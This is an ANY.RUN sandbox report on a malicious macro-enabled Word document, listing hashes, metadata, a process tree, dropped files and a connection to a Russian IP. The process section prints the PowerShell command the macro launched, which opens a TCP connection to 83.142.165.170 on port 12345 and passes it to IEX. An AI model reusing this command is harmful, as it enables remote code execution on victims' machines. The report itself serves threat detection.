analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ab96fa8a7fe07a35fb39e8e86b342161.docm

Full analysis: https://app.any.run/tasks/a967a004-015b-4b7e-8cdd-9cab637ce508
Verdict: Malicious activity
Analysis date: January 23, 2019, 07:53:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

AB96FA8A7FE07A35FB39E8E86B342161

SHA1:

C3AFA9DE1D2638A7ED35A579A835946521FE6034

SHA256:

12072334BA91BC5E366DFC6FABE3408674D60BEC9E49DEE1A95C2B45E20480DD

SSDEEP:

384:/imtnJHiVewFvL4On7kmvAw565EtVC9vHZDW/1FfCbAE/joeW1Sd9aw9EL383l+m:/LnJCVnZLdFAwo52o1s/TfiZtSzWlqmp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2972)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2972)

  • SUSPICIOUS

    • Connects to unusual port

      • powershell.exe (PID: 3864)

    • Creates files in the user directory

      • powershell.exe (PID: 3864)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2972)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x7aec387e
ZipCompressedSize: 391
ZipUncompressedSize: 1453
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: 1.7 hours
Pages: 6
Words: 3125
Characters: 17813
Application: Microsoft Office Word
DocSecurity: None
Lines: 148
Paragraphs: 41
ScaleCrop: No
HeadingPairs:
  • Название
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 20897
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: Sibastian
RevisionNumber: 31
CreateDate: 2019:01:22 07:43:00Z
ModifyDate: 2019:01:22 11:22:00Z

XMP

Title: -
Subject: -
Creator: Sibastian
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
33
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ab96fa8a7fe07a35fb39e8e86b342161.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3864powershell.exe "IEX (new-Object System.Net.Sockets.TcpClient('83.142.165.170', '12345'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 527
Read events
870
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9512.tmp.cvr
MD5:
SHA256:
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SQ5SFLVSHURHXNZFLJQR.temp
MD5:
SHA256:
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a0f9.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2972WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6E28B672E33ED44FA2233E4B0EA4D984
SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$96fa8a7fe07a35fb39e8e86b342161.docmpgc
MD5:9BDBFDB9D2C95756C9661ED9413641C2
SHA256:B8604565D6672FE0FF021D6A21E5CCA5D224B8C3106926E60781C7842D6F5E80
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3864
powershell.exe
83.142.165.170:12345
Intersvyaz-2 JSC
RU
unknown

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ab96fa8a7fe07a35fb39e8e86b342161.docm